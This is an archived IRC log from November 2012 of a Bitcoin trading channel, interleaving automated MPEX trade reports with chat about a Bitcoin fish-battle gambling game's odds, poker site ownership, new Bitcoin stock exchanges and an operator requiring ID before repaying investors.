http://blog.smickles.com/criticism/bitcoin-magazine-leaves-out-a-crucial-detail/#edit Nov 23 02:54:57 [MPEX] [S.MPOE] 55300 @ 0.00051 = 28.203 BTC [+] Nov 23 02:58:12 aha! Nov 23 02:58:14 [MPEX] [S.MPOE] 36516 @ 0.00051 = 18.6232 BTC [+] Nov 23 02:58:16 [MPEX] [S.MPOE] 16100 @ 0.00051012 = 8.2129 BTC [+] Nov 23 02:58:17 [MPEX] [S.MPOE] 11146 @ 0.00051025 = 5.6872 BTC [+] Nov 23 02:58:22 i'm curious if the biggest fish guy makes the changes proposed. Nov 23 03:00:04 we'll see, did you actually point your article out to him? Nov 23 03:00:23 emailed a link Nov 23 03:04:20 ;;ticker Nov 23 03:04:20 BTCUSD ticker | Best bid: 12.26859, Best ask: 12.30000, Bid-ask spread: 0.03141, Last trade: 12.31000, 24 hour volume: 60247.09652593, 24 hour low: 11.67000, 24 hour high: 12.43000, 24 hour vwap: 12.08073 Nov 23 03:04:24 o hey Nov 23 03:04:50 [MPEX] [S.MPOE] 24126 @ 0.00050781 = 12.2514 BTC [-] Nov 23 03:08:36 [MPEX] [S.MPOE] 21600 @ 0.00050436 = 10.8942 BTC [-] Nov 23 03:08:38 [MPEX] [S.MPOE] 22800 @ 0.0005035 = 11.4798 BTC [-] Nov 23 03:18:28 bears on unicycles Nov 23 03:24:22 [MPEX] [S.MPOE] 25824 @ 0.00050595 = 13.0657 BTC [+] Nov 23 03:24:23 [MPEX] [S.MPOE] 35900 @ 0.00050615 = 18.1708 BTC [+] Nov 23 03:24:25 [MPEX] [S.MPOE] 9120 @ 0.00051025 = 4.6535 BTC [+] Nov 23 03:24:26 [MPEX] [S.MPOE] 9456 @ 0.00051035 = 4.8259 BTC [+] Nov 23 03:26:24 http://pastebin.com/HxfJvM8H isn't this cute ? Nov 23 03:28:39 http://goatkcd.com/1136/ Nov 23 03:29:59 [MPEX] [S.MPOE] 27200 @ 0.00051035 = 13.8815 BTC [+] Nov 23 03:30:00 please check out our new bitcoin service startup: https://btcjam.com/listings/584 Nov 23 03:30:20 lol Nov 23 03:30:27 there's goatkcd now ?! Nov 23 03:36:45 [MPEX] [S.MPOE] 9894 @ 0.00051035 = 5.0494 BTC [+] Nov 23 03:36:46 [MPEX] [S.MPOE] 16660 @ 0.0005104 = 8.5033 BTC [+] Nov 23 03:38:31 [MPEX] [S.MPOE] 25740 @ 0.0005104 = 13.1377 BTC [+] Nov 23 03:38:31 [MPEX] [S.MPOE] 26710 @ 0.00051052 = 13.636 BTC [+] Nov 23 03:41:07 mircea_popescu: did you notice the new fishgame address and someone trying to buy them out? http://blog.smickles.com/bitcoin/the-biggest-fish/#update_2_22nov12 Nov 23 03:41:21 not rly. Nov 23 03:41:39 why buy them out ? "very low barrier to entry" "anyone could make a game" Nov 23 03:42:01 [MPEX] [S.MPOE] 2490 @ 0.00051052 = 1.2712 BTC [+] Nov 23 03:42:02 [MPEX] [S.MPOE] 22860 @ 0.00051058 = 11.6719 BTC [+] Nov 23 03:42:19 dunno Nov 23 03:42:28 FreeMoney of SealsWithClubs fame Nov 23 03:42:30 what fame is that ? Nov 23 03:42:37 poker Nov 23 03:43:04 iirc, it's the most active online bitcoin poker site Nov 23 03:44:38 yes, but micon runs it Nov 23 03:44:41 who's freemoney ? Nov 23 03:44:53 heh I put .2 in yesterday and attacked once, just woke up at im biggest fish Nov 23 03:45:12 you're the goatse ? i fed you earlier a little. like the idea. Nov 23 03:45:24 mircea_popescu: oh? i thought fremoney was significantly involved Nov 23 03:45:31 I could be wrong Nov 23 03:45:36 smickles i don't know that he isn't, which is whuy im asking. Nov 23 03:45:45 when you say fame, you got a fame right ? Nov 23 03:50:27 Ok, well, i'm asking them if they are related now :) Nov 23 03:52:14 lmao @mtgox support Nov 23 03:52:22 user : here, they've not paid me ONE MONTH LATER! Nov 23 03:52:35 support : we are sorry but we are out of cash today and it was a holiday in japan. Nov 23 03:54:31 how can you "be out of cash" Nov 23 03:55:53 welll.... Nov 23 03:57:59 http://blog.smickles.com/bitcoin/the-biggest-fish/#comment-8 << i'm not really sure what this is about Nov 23 03:58:43 spam. Nov 23 03:59:17 lol, i was totally taken in Nov 23 04:05:28 [MPEX] [S.MPOE] 34000 @ 0.00050548 = 17.1863 BTC [-] Nov 23 04:07:08 mircea_popescu: it seems freemoney was the op of the sealswithclubs forum post https://bitcointalk.org/index.php?topic=40077.0 Nov 23 04:07:32 aha! Nov 23 04:07:33 nice find. Nov 23 04:08:02 august 2011 was such a kickass month huh. Nov 23 04:08:08 EVERYONE WAS BORN THEN Nov 23 04:22:07 yes freemoney owns sealswithclubs and micon is paid as the pro and to promote last i heard Nov 23 04:23:57 thanks pigeons Nov 23 04:24:53 who is freemoney Nov 23 04:25:19 owner of sealswithclubs bitcoin poker site Nov 23 04:26:04 aptly named huh Nov 23 04:26:10 ah i thought there was more to it Nov 23 04:26:26 [MPEX] [S.MPOE] 28100 @ 0.00050672 = 14.2388 BTC [+] Nov 23 04:26:51 kakobrekla: the question stemmed from my calling him famous Nov 23 04:27:27 kakobrekla: here http://blog.smickles.com/bitcoin/the-biggest-fish/#update_2_22nov12 Nov 23 04:28:51 mr. smickles Nov 23 04:29:15 kakobrekla: which was prompted by https://bitcointalk.org/index.php?topic=127159.msg1352084#msg1352084 Nov 23 04:29:34 where he said he wanted to buy the fish game and make it 0-conf Nov 23 04:29:35 wait, doesnt the size of the fish reflect your odds of winning a battle Nov 23 04:29:47 yes Nov 23 04:29:56 thestringpuller: yo :) Nov 23 04:30:03 so ianbakewell is retarded Nov 23 04:30:12 kakobrekla: why? Nov 23 04:30:18 wha'd i miss? Nov 23 04:30:19 I do not want a 10 BTC fish. Nov 23 04:30:19 I would probably play a .5 fish 20 times tho... Nov 23 04:30:23 quoted. Nov 23 04:30:43 kakobrekla: i think that is a good position to hold tho Nov 23 04:30:57 ok Nov 23 04:31:04 its a stupid game in any case. Nov 23 04:31:07 consider the reward of 90% of the larger fish to the odds of loss Nov 23 04:31:29 and the odds of loss in consideration of 50% of your own weight Nov 23 04:32:02 kakobrekla http://trilema.com/2012/the-biggest-fish-revisited/ Nov 23 04:32:07 pretty much what you want to do. Nov 23 04:32:15 probabilistically, you want to aim at the fish which gives you the least odds of winning, so long as it is large enough compared to you Nov 23 04:32:35 smickles im not so sure you did that math right. Nov 23 04:32:51 mircea_popescu: it varies based on the given fish weights Nov 23 04:32:56 right. Nov 23 04:33:24 but it's: enemy*chance*.9 >= self*chance*.5 Nov 23 04:33:34 why * .9 ? Nov 23 04:33:35 when true, attack Nov 23 04:33:45 mircea_popescu: rtfm Nov 23 04:33:49 ;) Nov 23 04:33:51 um ? Nov 23 04:33:55 link ? lol Nov 23 04:34:08 [MPEX] [S.DICE] 2373 @ 0.00309664 = 7.3483 BTC [-] Nov 23 04:34:10 http://78.47.168.188/# Nov 23 04:34:21 and click "click here to read how to play" Nov 23 04:34:51 there's an octopus now Nov 23 04:35:11 can you just quote the thing here so i don't have to make a new fish ? Nov 23 04:35:27 kk, one sec, i don't think i can copypasta Nov 23 04:35:55 basically the way i see it, 100 btc fish A and 1 btc fish B Nov 23 04:36:10 A stands to gain .5 and to lose 50, B to gain 50 and lose .5 Nov 23 04:36:21 the odds are 1:101 for B to win and 100:101 for A to win. Nov 23 04:36:37 oh, it is .5 Nov 23 04:36:48 actually, .5*.9 Nov 23 04:36:51 what ? Nov 23 04:37:13 half the enemy is taken as winnings, and 90% of winnings go to you Nov 23 04:37:18 9% to ally Nov 23 04:37:23 and 1% to the owner Nov 23 04:37:33 aha... Nov 23 04:37:53 but it's: enemy*chance*.5*.9 >= self*chance*.5 Nov 23 04:38:10 uh Nov 23 04:38:11 er, s/but/so/ Nov 23 04:38:33 you realise you can just simplify "chance" out of that ? Nov 23 04:39:03 yeah, now that I have all the data in there Nov 23 04:39:10 basically your equation reads enemy * .9 > self Nov 23 04:39:12 which... wut ? Nov 23 04:39:40 self-chance = 1-enemy-chance tho Nov 23 04:40:10 well no/ Nov 23 04:40:36 it has a rake Nov 23 04:41:47 anyway, enemy weight * your chance to bite it should always be equal to your own weight. Nov 23 04:41:50 roughly speaking. Nov 23 04:41:53 if i've done it right, it makes sense to attack an 11 or higher fish when you are .1 Nov 23 04:42:07 [MPEX] [S.MPOE] 20850 @ 0.00050672 = 10.5651 BTC [+] Nov 23 04:42:27 ... Nov 23 04:42:30 the reason it makes sense to attack a large fish if you have more money than his weight is gambler's ruin Nov 23 04:42:38 ie, you can just keep attacking till you wipe him. Nov 23 04:43:18 but you wouldn't expect to profit if the odds are a certain way Nov 23 04:43:22 gamblin is so lame Nov 23 04:43:44 anyway, bbl Nov 23 04:43:59 [MPEX] [S.MPOE] 11650 @ 0.00050672 = 5.9033 BTC [+] Nov 23 04:44:01 [MPEX] [S.MPOE] 32600 @ 0.00050903 = 16.5944 BTC [+] Nov 23 04:44:02 [MPEX] [S.MPOE] 4700 @ 0.00051058 = 2.3997 BTC [+] Nov 23 04:44:11 according to my math, if the fish is 10, and you repeatedly go after it with a .1 fish, you should lose over the long haul average Nov 23 04:44:30 and that's assuming I have the correct data to begin with Nov 23 04:44:41 it could be dutch booked or something Nov 23 04:44:45 [MPEX] [S.MPOE] 21150 @ 0.00050548 = 10.6909 BTC [-] Nov 23 04:45:00 thestringpuller: but it's not gambling, it's advertising :) Nov 23 04:45:37 gamblintising Nov 23 04:48:01 [MPEX] [S.MPOE] 9600 @ 0.00050689 = 4.8661 BTC [+] Nov 23 04:50:03 lol https://twitter.com/NYTOnIt/status/271715694196961281 Nov 23 04:54:09 [MPEX] [S.MPOE] 8440 @ 0.00051058 = 4.3093 BTC [+] Nov 23 04:54:10 [MPEX] [S.MPOE] 3760 @ 0.00051064 = 1.92 BTC [+] Nov 23 05:05:35 [MPEX] [S.MPOE] 14000 @ 0.00050689 = 7.0965 BTC [-] Nov 23 05:05:37 [MPEX] [S.MPOE] 18349 @ 0.00050548 = 9.2751 BTC [-] Nov 23 05:14:02 [MPEX] [S.MPOE] 9901 @ 0.00050548 = 5.0048 BTC [-] Nov 23 05:14:03 [MPEX] [S.MPOE] 593 @ 0.0005035 = 0.2986 BTC [-] Nov 23 05:14:05 [MPEX] [S.MPOE] 13521 @ 0.00050336 = 6.8059 BTC [-] Nov 23 05:14:05 [MPEX] [S.MPOE] 13311 @ 0.00050323 = 6.6985 BTC [-] Nov 23 05:15:43 [MPEX] [S.DICE] 2627 @ 0.00309664 = 8.1349 BTC [-] Nov 23 05:15:44 [MPEX] [S.DICE] 2843 @ 0.00309982 = 8.8128 BTC [+] Nov 23 05:15:45 [MPEX] [S.DICE] 4530 @ 0.00313301 = 14.1925 BTC [+] Nov 23 05:16:09 [MPEX] [S.DICE] 2270 @ 0.00313301 = 7.1119 BTC [+] Nov 23 05:16:10 [MPEX] [S.DICE] 130 @ 0.00339944 = 0.4419 BTC [+] Nov 23 05:18:56 [MPEX] [S.MPOE] 33889 @ 0.00050323 = 17.054 BTC [-] Nov 23 05:18:57 [MPEX] [S.MPOE] 15511 @ 0.00050251 = 7.7944 BTC [-] Nov 23 05:26:19 nefario is one unlucky fish Nov 23 05:26:44 splish splash i was taking a bath Nov 23 05:29:47 [MPEX] [S.MPOE] 21183 @ 0.0005068 = 10.7355 BTC [+] Nov 23 05:33:34 [MPEX] [S.MPOE] 3489 @ 0.00050251 = 1.7533 BTC [-] Nov 23 05:33:36 [MPEX] [S.MPOE] 14931 @ 0.00050224 = 7.4989 BTC [-] Nov 23 05:34:13 [MPEX] [S.MPOE] 6319 @ 0.00050224 = 3.1737 BTC [-] Nov 23 05:34:15 [MPEX] [S.MPOE] 4481 @ 0.00050139 = 2.2467 BTC [-] Nov 23 05:35:29 mircea_popescu: direct from sealswithclubs, when i asked who freemoney was "Hi Michael, I own and manage Seals and often handle customer support." Nov 23 05:36:46 [MPEX] [S.MPOE] 35019 @ 0.00050139 = 17.5582 BTC [-] Nov 23 05:36:48 [MPEX] [S.MPOE] 1231 @ 0.00050051 = 0.6161 BTC [-] Nov 23 05:39:10 smickles cool! Nov 23 05:39:18 dub why now ? Nov 23 05:39:57 [MPEX] [S.DICE] 6000 @ 0.00337149 = 20.2289 BTC [-] Nov 23 05:40:53 Fox News claims in an exclusive report published this week that among the global taxes slated to be considered by the UN this year are a 1 percent tax on billionaires around the world, a “tiny” tax on all financial transactions worldwide and even yet another fee tacked on to already heavily-taxed airline tickets. Nov 23 05:40:58 who the fuck is the un again ? Nov 23 05:42:51 that thing they thought of after seeing hitler fail? Nov 23 05:46:24 http://www.inboxity.com/content/un-involved-africa.jpg Nov 23 05:47:01 hitler failed? Nov 23 05:47:28 smickles some might argue hitler was successful Nov 23 05:47:51 [MPEX] [S.DICE] 4350 @ 0.00339944 = 14.7876 BTC [+] Nov 23 05:52:35 Can someone explain how the UN can enforce taxing billionaires around the world? >.> Nov 23 05:52:54 anyone still extending credit to a government these days is absolutely loony. Nov 23 05:53:09 just sell the fucking tbills and forget govts even exist. Nov 23 05:53:22 let them loan themselves imaginary money till they're blue in the ballsack. Nov 23 05:53:54 [MPEX] [S.MPOE] 10500 @ 0.0005068 = 5.3214 BTC [+] Nov 23 05:53:56 [MPEX] [S.MPOE] 29177 @ 0.0005068 = 14.7869 BTC [+] Nov 23 05:56:09 Looking at coinbr.com for the first time ... I see the dashboard but how would I create an order? (I have not funded the account, if that matters.) Nov 23 05:56:36 ding jurov for that. Nov 23 05:57:50 I'm building a rocket. Leaving this rock. Anyone with me? Nov 23 05:58:29 i ain't leaving. Nov 23 06:00:33 mircea_popescu: Does coinbr allow orders for MPOE options too? Nov 23 06:00:52 actually i dunno Nov 23 06:00:59 i don't see why not tho ? Nov 23 06:01:11 Cool, I'll PM jurov. Nov 23 06:07:44 sgornick: Yes, you have options there Nov 23 06:07:44 But you can't do much on the site without a balance... Nov 23 06:09:13 you around? :P Nov 23 06:11:44 [MPEX] [S.MPOE] 2690 @ 0.0005068 = 1.3633 BTC [+] Nov 23 06:11:45 [MPEX] [S.MPOE] 8540 @ 0.00051064 = 4.3609 BTC [+] Nov 23 06:11:47 [MPEX] [S.MPOE] 3970 @ 0.00051069 = 2.0274 BTC [+] Nov 23 06:19:37 pie to the face, lulz Nov 23 06:20:14 [MPEX] [S.MPOE] 2750 @ 0.00050677 = 1.3936 BTC [-] Nov 23 06:20:15 [MPEX] [S.MPOE] 6550 @ 0.00050676 = 3.3193 BTC [-] Nov 23 06:20:16 [MPEX] [S.MPOE] 27700 @ 0.00050195 = 13.904 BTC [-] Nov 23 06:21:06 You have NaN BTC. Nov 23 06:22:36 so many bitcoins that it's not even a number any more. Nov 23 06:23:30 sup Chaang-Noi :P Nov 23 06:24:24 nefario on top Nov 23 06:26:08 hi Ukto :) Nov 23 06:31:26 [MPEX] [S.MPOE] 4550 @ 0.00050222 = 2.2851 BTC [+] Nov 23 06:31:28 [MPEX] [S.MPOE] 63062 @ 0.00051069 = 32.2051 BTC [+] Nov 23 06:31:29 [MPEX] [S.MPOE] 18999 @ 0.00051072 = 9.7032 BTC [+] Nov 23 06:42:37 [MPEX] [S.MPOE] 3000 @ 0.00050215 = 1.5065 BTC [-] Nov 23 06:42:39 [MPEX] [S.MPOE] 22500 @ 0.00050214 = 11.2982 BTC [-] Nov 23 06:46:01 http://trilema.com/2012/voluntary-contracts-after-a-while/#comment-90636 Nov 23 06:46:06 whoa! someone contributed a story! **** BEGIN LOGGING AT Fri Nov 23 14:23:03 2012 Nov 23 14:35:11 so is ANYONE left who's not working on, launching or trying to sell some sort of btc stock exchange ? Nov 23 14:35:35 to think that only a few short months away everyone was pissing their pants thinking of the sec. Nov 23 14:37:55 [MPEX] [S.MPOE] 28254 @ 0.00050638 = 14.3073 BTC [+] Nov 23 14:37:56 [MPEX] [S.MPOE] 8346 @ 0.00050897 = 4.2479 BTC [+] Nov 23 14:42:23 [MPEX] [S.MPOE] 28450 @ 0.00050491 = 14.3647 BTC [-] Nov 23 14:42:25 [MPEX] [S.MPOE] 10152 @ 0.00049851 = 5.0609 BTC [-] Nov 23 14:57:13 dub: hey, are you still going to do your proxy when the block reward halves? Nov 23 15:05:34 [MPEX] [S.MPOE] 7000 @ 0.00050251 = 3.5176 BTC [+] Nov 23 15:16:57 [MPEX] [S.MPOE] 17950 @ 0.00050251 = 9.0201 BTC [+] Nov 23 15:30:31 [MPEX] [S.MPOE] 10154 @ 0.00050897 = 5.1681 BTC [+] Nov 23 15:30:32 [MPEX] [S.MPOE] 3159 @ 0.00051073 = 1.6134 BTC [+] Nov 23 15:30:46 mircea_popescu: the SEC stuff was all false speculation from the get go Nov 23 15:31:03 some of us never "pissed out pants" and did what we wanted from teh get go :P Nov 23 15:31:10 our* Nov 23 15:31:44 some Nov 23 15:32:28 well... "everyone" Nov 23 15:33:09 mircea_popescu: is there anyone else who has a btc stock exchange thats been created since that is ready to launch ? Nov 23 15:33:31 o, the forum is replete. Nov 23 15:33:46 im not even sure how many there are anymore. 12 ? 20 ? Nov 23 15:33:51 lol Nov 23 15:33:58 heh Nov 23 15:34:01 the question is Nov 23 15:34:02 actually launched/usable? :P Nov 23 15:34:08 whos going to win? Nov 23 15:34:08 I saw one the other day that was ahorrid green color Nov 23 15:34:17 well i didn't dig that deep ukto Nov 23 15:34:25 nah, someone had linked it Nov 23 15:34:26 i'm backlogged. Nov 23 15:34:42 I cant stand forums Nov 23 15:34:47 so I avoid them like the plague Nov 23 15:35:38 hire pr. Nov 23 15:36:09 anyway, i just looked. your thing is something more like that btcjam disaster than straight exchange Nov 23 15:36:22 hopefully you make more sense than that guy. Nov 23 15:36:32 [MPEX] [S.MPOE] 12641 @ 0.00051073 = 6.4561 BTC [+] Nov 23 15:36:33 [MPEX] [S.MPOE] 8559 @ 0.00051141 = 4.3772 BTC [+] Nov 23 15:38:01 actually Nov 23 15:38:09 right now its almost a literal glbse clone Nov 23 15:38:17 Ukto: that doesnt sound so bad Nov 23 15:38:24 the kickstarter stuff will be added later Nov 23 15:38:27 Diablo-D3: exactly Nov 23 15:38:32 most ppl have told me they dont want something differnt. Nov 23 15:38:40 they just want what worked, and what they knew Nov 23 15:38:56 so I did it, in a fashionable way. Nov 23 15:39:39 have you decided if you'll allow zero coupon non-collable company bonds? Nov 23 15:39:47 no bonds right now Nov 23 15:39:58 far too scammish Nov 23 15:40:02 until I come up with a plan for it Nov 23 15:40:12 ppl can use all the other wannabe's to scam ppl with those for now Nov 23 15:40:13 what about just limited allowance of them? Nov 23 15:40:27 considered it, just havent worked it all the way through yet Nov 23 15:40:36 jsut wanna focus on the core system right now Nov 23 15:40:39 and get it up Nov 23 15:40:50 well, if I launch DMC 2.0, thats the way I want to go with funding I think Nov 23 15:40:51 still have a few more important things, but wont hold back launch Nov 23 15:40:59 your considering that? Nov 23 15:41:05 yeah. Nov 23 15:41:08 its the least problematic way Nov 23 15:42:03 [MPEX] [S.MPOE] 41074 @ 0.00050679 = 20.8159 BTC [-] Nov 23 15:42:23 so far of the ppl who have their asset lists from nefario Nov 23 15:42:29 2 are considering my system Nov 23 15:43:40 I could issue them across multiple exchanges I think Nov 23 15:44:12 or just issue them to exchanges directly and have them do whatever Nov 23 15:46:15 hehehe Nov 23 15:47:06 [MPEX] [S.MPOE] 6479 @ 0.00050679 = 3.2835 BTC [-] Nov 23 15:47:07 [MPEX] [S.MPOE] 3950 @ 0.00050251 = 1.9849 BTC [-] Nov 23 15:47:54 [MPEX] [S.MPOE] 9220 @ 0.00049851 = 4.5963 BTC [-] Nov 23 15:47:55 [MPEX] [S.MPOE] 13918 @ 0.0004985 = 6.9381 BTC [-] Nov 23 15:47:57 [MPEX] [S.MPOE] 1995 @ 0.00049819 = 0.9939 BTC [-] Nov 23 15:48:54 Ukto: what I was thinking was this Nov 23 15:49:24 issue "real" certificates as digitally signed certs Nov 23 15:50:25 all numbered and signed with a pgp key used only for this and then locked away in a vault Nov 23 15:53:04 [MPEX] [S.MPOE] 29071 @ 0.00049959 = 14.5236 BTC [+] Nov 23 15:54:00 Ukto: so I think it'd work Nov 23 15:55:48 since no interest is paid, I dont have to worry about that blowing up because some exchange went south Nov 23 15:56:26 and since its non-callable, what its actually worth is set in stone Nov 23 15:58:24 "The BitForce SC chip is now in final stage development. Initial product delivery is scheduled for November, 2012." Nov 23 16:00:57 [MPEX] [S.MPOE] 10041 @ 0.00051141 = 5.1351 BTC [+] Nov 23 16:00:58 [MPEX] [S.MPOE] 9059 @ 0.00051148 = 4.6335 BTC [+] Nov 23 16:05:26 [MPEX] [S.MPOE] 3675 @ 0.00051148 = 1.8797 BTC [+] Nov 23 16:05:26 [MPEX] [S.MPOE] 10399 @ 0.00051184 = 5.3226 BTC [+] Nov 23 16:05:28 [MPEX] [S.MPOE] 11526 @ 0.00051208 = 5.9022 BTC [+] Nov 23 16:11:03 [MPEX] [S.MPOE] 11629 @ 0.00050676 = 5.8931 BTC [-] Nov 23 16:11:05 [MPEX] [S.MPOE] 1571 @ 0.00049819 = 0.7827 BTC [-] Nov 23 16:15:22 mircea_popescu: doesnt matter at this point Nov 23 16:15:31 even if they ship, its still forever a scam Nov 23 16:19:11 why are you so bitter Nov 23 16:28:53 [MPEX] [S.MPOE] 25050 @ 0.00049819 = 12.4797 BTC [-] Nov 23 16:31:27 mircea_popescu: that isnt it Nov 23 16:31:36 look at the terms of dibflsc Nov 23 16:31:43 yaya i know. Nov 23 16:31:44 oct 31st. Nov 23 16:32:25 they failed to ship, they are a scam. Nov 23 16:35:24 [MPEX] [S.MPOE] 21363 @ 0.00049819 = 10.6428 BTC [-] Nov 23 16:35:26 [MPEX] [S.MPOE] 22887 @ 0.00049789 = 11.3952 BTC [-] Nov 23 16:38:01 hmm Nov 23 16:38:06 Diablo-D3: mebbe Nov 23 16:38:31 in the end, I will let anyone attempt to create an asset, and write it up. I will personally decide weather to greenlight it or not. Nov 23 16:39:22 although Nov 23 16:39:58 does anyone have an excerpt from GLBSE's api page? :/ Nov 23 16:40:11 I need to double check some things Nov 23 16:41:34 not me Nov 23 16:41:40 been digging around, but my googlefu has failed me Nov 23 16:42:02 [MPEX] [S.MPOE] 23989 @ 0.00051208 = 12.2843 BTC [+] Nov 23 16:47:45 [MPEX] [S.MPOE] 7960 @ 0.00051208 = 4.0762 BTC [+] Nov 23 16:47:47 [MPEX] [S.MPOE] 34984 @ 0.00051211 = 17.9157 BTC [+] Nov 23 16:52:33 https://bitcointalk.org/index.php?topic=75802.msg1353074#msg1353074 Nov 23 16:54:47 [MPEX] [S.MPOE] 3400 @ 0.00049925 = 1.6975 BTC [-] Nov 23 16:54:49 [MPEX] [S.MPOE] 9800 @ 0.00049924 = 4.8926 BTC [-] Nov 23 16:56:53 [MPEX] [S.MPOE] 25418 @ 0.00051211 = 13.0168 BTC [+] Nov 23 16:56:54 [MPEX] [S.MPOE] 22182 @ 0.00051245 = 11.3672 BTC [+] Nov 23 17:04:30 [MPEX] [S.MPOE] 4194 @ 0.00051245 = 2.1492 BTC [+] Nov 23 17:04:31 [MPEX] [S.MPOE] 22815 @ 0.00051256 = 11.6941 BTC [+] Nov 23 17:04:32 [MPEX] [S.MPOE] 27091 @ 0.00051296 = 13.8966 BTC [+] Nov 23 17:08:17 [MPEX] [S.MPOE] 28600 @ 0.00049924 = 14.2783 BTC [-] Nov 23 17:11:53 how much is all this costing you in the end gigavps ? Nov 23 17:12:09 mircea_popescu a lot Nov 23 17:12:14 sucks, Nov 23 17:12:20 [MPEX] [S.MPOE] 2945 @ 0.00049924 = 1.4703 BTC [-] Nov 23 17:12:22 [MPEX] [S.MPOE] 35655 @ 0.00049921 = 17.7993 BTC [-] Nov 23 17:12:24 but i admire the drive to do things properly for once. Nov 23 17:12:54 (for once i don't mean about you, i mean about bitcoin in general) Nov 23 17:13:22 you should send mpoe-pr into my thread to quote you on that Nov 23 17:13:44 [MPEX] [S.MPOE] 13743 @ 0.00050446 = 6.9328 BTC [+] Nov 23 17:13:46 [MPEX] [S.MPOE] 2079 @ 0.00049921 = 1.0379 BTC [-] Nov 23 17:13:51 yeah. Nov 23 17:19:21 [MPEX] [S.MPOE] 16713 @ 0.00049789 = 8.3212 BTC [-] Nov 23 17:19:23 [MPEX] [S.MPOE] 6687 @ 0.00049755 = 3.3271 BTC [-] Nov 23 17:22:42 [MPEX] [S.MPOE] 25950 @ 0.00049755 = 12.9114 BTC [-] Nov 23 17:24:24 [MPEX] [S.DICE] 327 @ 0.00325681 = 1.065 BTC [+] Nov 23 17:25:31 [MPEX] [S.MPOE] 6478 @ 0.00049912 = 3.2333 BTC [+] Nov 23 17:34:17 [MPEX] [S.MPOE] 20359 @ 0.00051296 = 10.4434 BTC [+] Nov 23 17:34:19 [MPEX] [S.MPOE] 6791 @ 0.000513 = 3.4838 BTC [+] Nov 23 17:36:58 [MPEX] [S.MPOE] 63809 @ 0.000513 = 32.734 BTC [+] Nov 23 17:37:00 [MPEX] [S.MPOE] 8441 @ 0.00051301 = 4.3303 BTC [+] Nov 23 17:39:01 [MPEX] [S.MPOE] 18900 @ 0.00051124 = 9.6624 BTC [-] Nov 23 17:41:55 hi giga Nov 23 17:42:05 whats up with that mail I recieved Nov 23 17:42:27 You can just pay me without ID verification Nov 23 17:42:50 in short I will not send ID, proof of residence or anything Nov 23 17:43:48 Is this a loophole not to pay back? Nov 23 17:44:12 hi PsychoticBoy Nov 23 17:44:30 hi giga Nov 23 17:45:03 [MPEX] [S.MPOE] 19042 @ 0.00051301 = 9.7687 BTC [+] Nov 23 17:45:04 [MPEX] [S.MPOE] 6790 @ 0.00051358 = 3.4872 BTC [+] Nov 23 17:45:34 [MPEX] [S.MPOE] 6532 @ 0.00051124 = 3.3394 BTC [-] Nov 23 17:45:36 [MPEX] [S.MPOE] 3350 @ 0.00050956 = 1.707 BTC [-] Nov 23 17:45:37 [MPEX] [S.MPOE] 27668 @ 0.00050305 = 13.9184 BTC [-] Nov 23 17:50:04 [MPEX] [S.MPOE] 7532 @ 0.00050305 = 3.789 BTC [-] Nov 23 18:02:54 [MPEX] [S.MPOE] 8213 @ 0.00049755 = 4.0864 BTC [-] Nov 23 18:02:55 [MPEX] [S.MPOE] 21379 @ 0.00049706 = 10.6266 BTC [-] Nov 23 18:10:48 [MPEX] [S.MPOE] 10900 @ 0.00049707 = 5.4181 BTC [+] Nov 23 18:10:49 [MPEX] [S.MPOE] 2071 @ 0.00049706 = 1.0294 BTC [-] Nov 23 18:10:50 [MPEX] [S.MPOE] 10541 @ 0.00049618 = 5.2302 BTC [-] Nov 23 18:10:51 [MPEX] [S.MPOE] 22800 @ 0.00049531 = 11.2931 BTC [-] Nov 23 18:10:52 [MPEX] [S.MPOE] 4088 @ 0.00049479 = 2.0227 BTC [-] Nov 23 18:15:56 gigavps someone is asking for a nda from the lawyer Nov 23 18:16:01 truely this is going well. Nov 23 18:16:07 also, people know shit. Nov 23 18:16:29 i haven't been looking forward to this Nov 23 18:16:51 how does a lawyer nda sound like ? Nov 23 18:17:32 "as a lawyer, I hereby promise to be a lawyer and behave accordingly to the rules. if I don't, with or without this useless declaration I am still held liable" Nov 23 18:18:29 [MPEX] [S.MPOE] 4000 @ 0.0004948 = 1.9792 BTC [+] Nov 23 18:18:30 [MPEX] [S.MPOE] 8400 @ 0.00049479 = 4.1562 BTC [-] Nov 23 18:19:01 "and if i i ever give advice like the law student nefario met in a sandwich shop, i will step down" Nov 23 18:19:34 ya, that famous counsel still hath not answered. Nov 23 18:21:19 PsychoticBoy seems to me more like the recognition of how fucked up things are than any sort of loophole. Nov 23 18:21:33 probably an ultimately doomed but otherwise brave attempt to plug all loopholes. Nov 23 18:22:33 giga likely paid a lot for his counsel, so he's likely to follow it Nov 23 18:22:49 pigeons you still in town? Nov 23 18:22:50 [MPEX] [S.MPOE] 20950 @ 0.00049844 = 10.4423 BTC [+] Nov 23 18:22:52 yes Nov 23 18:23:38 I concur, giga has or will be paying quite a bit for them to handle the volume Nov 23 18:24:37 especially coupled with the insanity. Nov 23 18:24:51 high volume of first timers. ouch. Nov 23 18:24:58 I will take ABM/PGM to a lawyer too, send info or never get paid mwuhahaha Nov 23 18:25:54 [MPEX] [S.MPOE] 11592 @ 0.00049479 = 5.7356 BTC [-] Nov 23 18:25:56 [MPEX] [S.MPOE] 24100 @ 0.00049478 = 11.9242 BTC [-] Nov 23 18:25:56 [MPEX] [S.MPOE] 2358 @ 0.00049453 = 1.1661 BTC [-] Nov 23 18:27:34 PsychoticBoy expect the laywer to want to be paid up front tho Nov 23 18:27:55 I go prodeo Nov 23 18:27:57 lol Nov 23 18:28:55 prodeo ? Nov 23 18:29:05 pro Deo you mean, as in for god, as in, for free ? Nov 23 18:29:06 I can pay, thats not the point, Its the whole ¨its not my responsibility anymore go to my lawyer¨ thing that stings me Nov 23 18:29:26 yep thats w\hat i mean ;) Nov 23 18:29:35 well people will have to at the very least sign a renounciation of claim Nov 23 18:29:43 the only way to handle that is through a lawyer Nov 23 18:33:58 giga is off, probably got to hot under his feet Nov 23 18:34:32 So giga is #1 not to pay Nov 23 18:35:01 wasn't he about 50%+ of all volume anyway ? Nov 23 18:36:38 [MPEX] [S.MPOE] 40500 @ 0.00049467 = 20.0341 BTC [+] Nov 23 18:38:03 he was the largest glbse asset Nov 23 18:38:32 [MPEX] [S.MPOE] 22818 @ 0.00049844 = 11.3734 BTC [+] Nov 23 18:40:36 [MPEX] [S.MPOE] 22600 @ 0.00049919 = 11.2817 BTC [+] Nov 23 18:40:38 [MPEX] [S.MPOE] 9400 @ 0.00050348 = 4.7327 BTC [+] Nov 23 18:44:55 [MPEX] [S.MPOE] 34350 @ 0.00050348 = 17.2945 BTC [+] Nov 23 18:50:25 heh Nov 23 18:50:55 [MPEX] [S.MPOE] 27060 